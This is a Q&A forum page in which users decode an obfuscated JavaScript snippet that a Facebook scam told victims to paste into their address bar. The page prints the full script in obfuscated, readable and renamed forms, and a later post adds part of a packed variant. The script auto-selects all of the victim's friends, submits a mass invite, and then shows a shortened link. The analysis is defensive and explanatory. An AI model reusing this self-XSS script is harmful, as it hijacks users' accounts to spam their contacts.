I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?
Here's the source code:
// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));
-
possible duplicate of Javascript compiled or not? Check inside....user229044– user229044 ♦2010年05月13日 13:33:53 +00:00Commented May 13, 2010 at 13:33
-
@meager - how is it a duplicate? Even if the code snippet is the same (which it is not exactly), the question around the code is totally different.Rob Levine– Rob Levine2010年05月13日 13:40:08 +00:00Commented May 13, 2010 at 13:40
3 Answers 3
Here is the formatted source:
var a = ["innerHTML",
"app4949752878_app4949752878_dd",
"getElementById",
"<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
"suggest",
"MouseEvents",
"createEvent",
"click",
"initEvent",
"dispatchEvent",
"select_all",
"sgm_invite_form",
"/ajax/social_graph/invite_dialog.php",
"submitDialog"];
void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);
The a array holds all strings used by the code.
Here it is with the strings put back in place:
void (document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
Finally, here it is with decent names and structure:
var messageElement = document.getElementById('app4949752878_app4949752878_dd');
messageElement.innerHTML =
"<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";
var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);
setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
answered Apr 14, 2010 at 0:40
SLaks
891k182 gold badges1.9k silver badges2k bronze badges
Sign up to request clarification or add additional context in comments.
9 Comments
SLaks
Please wait while I translate it.
Danten
It looks like a cheap way of selecting all of your friends and inviting them to use the app.
SLaks
@yar: Firebug.
alert(function() { any source });Sripathi Krishnan
The interesting thing is how many people actually fell for it - 13K! And it includes people from UK, US and Australia. See the report over here - bit.ly/info/bTl0vj
Atmocreations
@SLaks: The Firebug trick is nice. Didn't know that alerting a function actually parses it and prints it in a pretty way. Thanks!
|
I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.
My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking, at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity used and abused or your bank accounts drained.
answered Apr 14, 2010 at 1:49
drekka
22.1k15 gold badges88 silver badges146 bronze badges
Comments
Very interesting. How did you go about decoding it though?
I got something like this just now, but it didn't look like the sametype of content. Part of the code (the latter half) is below. I didn't know if I should paste the entire code. Newbie here.
(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
Comments
lang-js